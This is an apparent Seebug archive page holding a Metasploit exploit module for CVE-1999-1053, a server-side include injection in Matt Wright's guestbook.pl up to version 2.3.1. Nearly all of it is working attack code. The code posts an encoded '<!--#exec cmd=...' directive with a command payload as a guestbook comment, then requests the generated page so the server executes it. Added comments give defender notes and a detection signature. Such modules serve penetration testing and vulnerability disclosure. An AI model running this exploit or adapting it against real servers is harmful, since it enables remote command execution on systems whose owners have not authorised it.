seebugRootSSV:66964
HistoryJul 01, 2014 - 12:00 a.m.

The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability

2014-07-01 00:00:00
Root
www.seebug.org
40

No description provided by source.


##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require &#39;msf/core&#39;


# Metasploit module for CVE-1999-1053 (OSVDB 84, BID 776): Matt Wright
# guestbook.pl <= 2.3.1 writes visitor-supplied HTML into guestbook.html.
# When the web server additionally runs its SSI handler on '.html' files,
# an SSI directive posted as a guestbook comment is evaluated server-side
# once the generated page is requested.
#
# Defender notes:
#   * Both preconditions named in the Description below are non-default
#     configuration; disabling HTML posting in guestbook.pl, or not mapping
#     the SSI handler to '.html', removes the exploit path.
#   * Detection: a POST to the guestbook script whose 'comments' field
#     contains '<!--#exec' (possibly URL-encoded), or that string appearing
#     in the served guestbook.html.
class Metasploit3 < Msf::Exploit::Remote

	# Provides send_request_cgi / send_request_raw and the HTTP datastore
	# options used in #exploit.
	include Msf::Exploit::Remote::HttpClient

	# Module metadata (name, references, payload constraints) plus the two
	# user-facing options: URI (path of guestbook.pl) and URIOUT (path of the
	# HTML file the script writes and the server serves with SSI).
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
			'Description'    => %q{
				The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the '.html' file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '1999-1053' ],
					[ 'OSVDB', '84' ],
					[ 'BID', '776' ],
				],
			'Privileged'     => false,
			# The payload is embedded as text inside an SSI directive, so only
			# command ('cmd') payloads apply; 'Space' caps the encoded command
			# length and NOPs are meaningless here.
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => [ 'unix', 'win', 'linux' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Nov 05 1999',
			'DefaultTarget'  => 0))

			# URI: where guestbook.pl is served; URIOUT: the HTML page it
			# writes entries into. Both default to the script's stock paths.
			register_options(
				[
					OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
					OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
				], self.class)
	end

	# Posts a single guestbook entry whose 'comments' field is an SSI exec
	# directive wrapping the command payload, then requests the output page.
	# Neither response is inspected: req1 and req2 are assigned but never
	# read, so the module gives no feedback on whether the post or the SSI
	# evaluation succeeded.
	def exploit
		# Random filler for the remaining form fields; the values themselves
		# are not significant to the technique.
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country		= rand_text_alphanumeric(20)

		# SSI directive carrying the payload. Double quotes inside the encoded
		# command are backslash-escaped so they survive the cmd="..." attribute,
		# then the whole directive is URL-encoded ('hex-normal' mode) for the
		# form body.
		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')

		# Submit the entry as a form-encoded POST to guestbook.pl; the second
		# argument (25) is the response timeout in seconds.
		req1 = send_request_cgi({
			'uri'     => datastore['URI'],
			'method'  => 'POST',
			'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
		}, 25)

		# Fetch the page guestbook.pl wrote so the server's SSI handler
		# processes the new entry. No 'method' is given, so send_request_raw's
		# default applies.
		req2 = send_request_raw({
			'uri'     => datastore['URIOUT'],
		}, 25)
		
	end
end